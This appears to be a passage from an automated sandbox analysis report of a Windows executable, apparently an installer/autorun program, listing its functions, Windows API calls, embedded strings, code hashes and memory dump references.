                                                                                                                                              • String ID: DXInstalled = %d$InstallDirectXIfRequired
                                                                                                                                              • API String ID: 715370876-4124889539
                                                                                                                                              • Opcode ID: bdc4443d0d3ec1e238e24dd1fd3f35842bfbf80ed1653aedad27dd03790dd8a6
                                                                                                                                              • Instruction ID: 364755a666ca341e749ee64d0003a40c6949535c43a42a4e9d33c4ab1bb0a936
                                                                                                                                              • Opcode Fuzzy Hash: bdc4443d0d3ec1e238e24dd1fd3f35842bfbf80ed1653aedad27dd03790dd8a6
                                                                                                                                              • Instruction Fuzzy Hash: E851C4716487006BD300EB94FC42FAB3BA9AB85706F04847EFD44A72D3DA79D5048B6E
                                                                                                                                              Function 0042C814 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0042C8FC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: 72ef37e3f52f69ed0ec66c4e8790f2510e5f96e623d6d1493fedeb9f51a5ca00
                                                                                                                                              • Instruction ID: 8280d1e270eca7936ff5276bf182434933e20333d3727ff594148b0d188492fc
                                                                                                                                              • Opcode Fuzzy Hash: 72ef37e3f52f69ed0ec66c4e8790f2510e5f96e623d6d1493fedeb9f51a5ca00
                                                                                                                                              • Instruction Fuzzy Hash: 48517FB1A04268DFDB22DFA9EC80BEDBBB8FF46304F50411AE8559B252DB345A41CF15
                                                                                                                                              Function 004286E3 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 00428705
                                                                                                                                                • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                                              • __lock.LIBCMT ref: 00428751
                                                                                                                                              • EnterCriticalSection.KERNEL32(0000008C,0044CD58,00000014,00432A14,?,?,00000000), ref: 0042879B
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0000008C), ref: 004287A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Enter__lock$Leave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 885841014-0
                                                                                                                                              • Opcode ID: a01da40aeaf7a3bb659276398149747342c523524fdf739e22d43d76ee2309d8
                                                                                                                                              • Instruction ID: b3503f7208acb3f95ac1f212b98e40c77cfa49c85add1a9a95d8a4e58ead19da
                                                                                                                                              • Opcode Fuzzy Hash: a01da40aeaf7a3bb659276398149747342c523524fdf739e22d43d76ee2309d8
                                                                                                                                              • Instruction Fuzzy Hash: 98411771A023228AD710AF65EC4576E7BA0AF41324FA4862FD121962D1DF7C9541CB1C
                                                                                                                                              Function 00417360 Relevance: 6.0, APIs: 4, Instructions: 42registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?,?,?), ref: 00417386
                                                                                                                                              • RegEnumKeyExA.ADVAPI32 ref: 004173B1
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 004173C1
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004173CE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseDeleteEnumOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4142876296-0
                                                                                                                                              • Opcode ID: e88a5e974ed7bd7e7be99ffb565bc9357ecc90e66e98b9816a88c69fb15ff6d6
                                                                                                                                              • Instruction ID: 816ecf25c106d77b39d132cd8e82fa92df93f4f8198aa37a08063b162ff1abf5
                                                                                                                                              • Opcode Fuzzy Hash: e88a5e974ed7bd7e7be99ffb565bc9357ecc90e66e98b9816a88c69fb15ff6d6
                                                                                                                                              • Instruction Fuzzy Hash: EA016DB6204201AFE320CB54DC49FEBB7ACEB89B04F00852DBA95D2151D6749804CBA6
                                                                                                                                              Function 00433DA0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___addl
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2260456530-0
                                                                                                                                              • Opcode ID: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
                                                                                                                                              • Instruction ID: 9a3622a891a97d8ac40710fbd079e3f9d72052691bd83aec0a43e73614e04fb6
                                                                                                                                              • Opcode Fuzzy Hash: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
                                                                                                                                              • Instruction Fuzzy Hash: CAF0F032400606BFCB225F02DC01EA3B7EDFF19301F04142AFD698A131E722EA69CB51
                                                                                                                                              Function 00411740 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 255COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,00446A11,00000001), ref: 004118EB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                              • String ID: %c:\$common_filelist.txt
                                                                                                                                              • API String ID: 1611563598-3546436211
                                                                                                                                              • Opcode ID: bf4860426ae5a8c665500b95706d3b05aabf3409a8e98bf8efb5ed0b0f1f40b4
                                                                                                                                              • Instruction ID: 075e01302480f862047a0cd229708d3c32eb167a873184b3eb99f0da593a5d69
                                                                                                                                              • Opcode Fuzzy Hash: bf4860426ae5a8c665500b95706d3b05aabf3409a8e98bf8efb5ed0b0f1f40b4
                                                                                                                                              • Instruction Fuzzy Hash: 2E815FB16043406AD320EB659C41FFB77D89F85304F44482FFA8593292EB7CD949CB6A
                                                                                                                                              Function 0040F2B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetUserDefaultLangID.KERNEL32 ref: 0040F3C8
                                                                                                                                              Strings
                                                                                                                                              • No Languages Selected!, xrefs: 0040F3B5
                                                                                                                                              • Corrupted AutoRun.CFG File, xrefs: 0040F3B0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DefaultLangUser
                                                                                                                                              • String ID: Corrupted AutoRun.CFG File$No Languages Selected!
                                                                                                                                              • API String ID: 768647712-574851024
                                                                                                                                              • Opcode ID: d9ad3f59bbd157dacd61f4ff9f055d84f5177f32f5bf328f948fb3637ce815af
                                                                                                                                              • Instruction ID: 53668502b466ec9360e6261e60baa1c822bb85f3723ac8f7f48d7bf6175b14eb
                                                                                                                                              • Opcode Fuzzy Hash: d9ad3f59bbd157dacd61f4ff9f055d84f5177f32f5bf328f948fb3637ce815af
                                                                                                                                              • Instruction Fuzzy Hash: BA4104319047525BC736CB3C8444267FB91AF96314F0982BBDC94ABB92C334A94EC784
                                                                                                                                              Function 00428CC8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info
                                                                                                                                              • String ID: $
                                                                                                                                              • API String ID: 1807457897-3032137957
                                                                                                                                              • Opcode ID: f62c9546a7172f50e4f73095ef02771184208bba8ed88dd7c2354f7363845b2c
                                                                                                                                              • Instruction ID: 7ce7dcbe67f11c731291b5b1965c876956d7d29a79eba9a73914ef292cf8c08b
                                                                                                                                              • Opcode Fuzzy Hash: f62c9546a7172f50e4f73095ef02771184208bba8ed88dd7c2354f7363845b2c
                                                                                                                                              • Instruction Fuzzy Hash: 35417D302012685EEB118764ED99BFF7BD8DB02704F640CEAE645D7152CB684E89D79C
                                                                                                                                              Function 00411757 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,00446A11,00000001), ref: 004118EB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                              • String ID: %c:\$common_filelist.txt
                                                                                                                                              • API String ID: 1611563598-3546436211
                                                                                                                                              • Opcode ID: e75b4604f8b7d37f5be918e54a961c424057a386e1b3c4596995fb37daa8ae50
                                                                                                                                              • Instruction ID: 6025519ab524a28bed39fbe42f5c2c1978188ea60c5d789c7bac0d9d67ab69ce
                                                                                                                                              • Opcode Fuzzy Hash: e75b4604f8b7d37f5be918e54a961c424057a386e1b3c4596995fb37daa8ae50
                                                                                                                                              • Instruction Fuzzy Hash: A6412BB15043446AD320EBA09C41FEB77989F85705F44481FFB44562C2FBBCE645CB6A
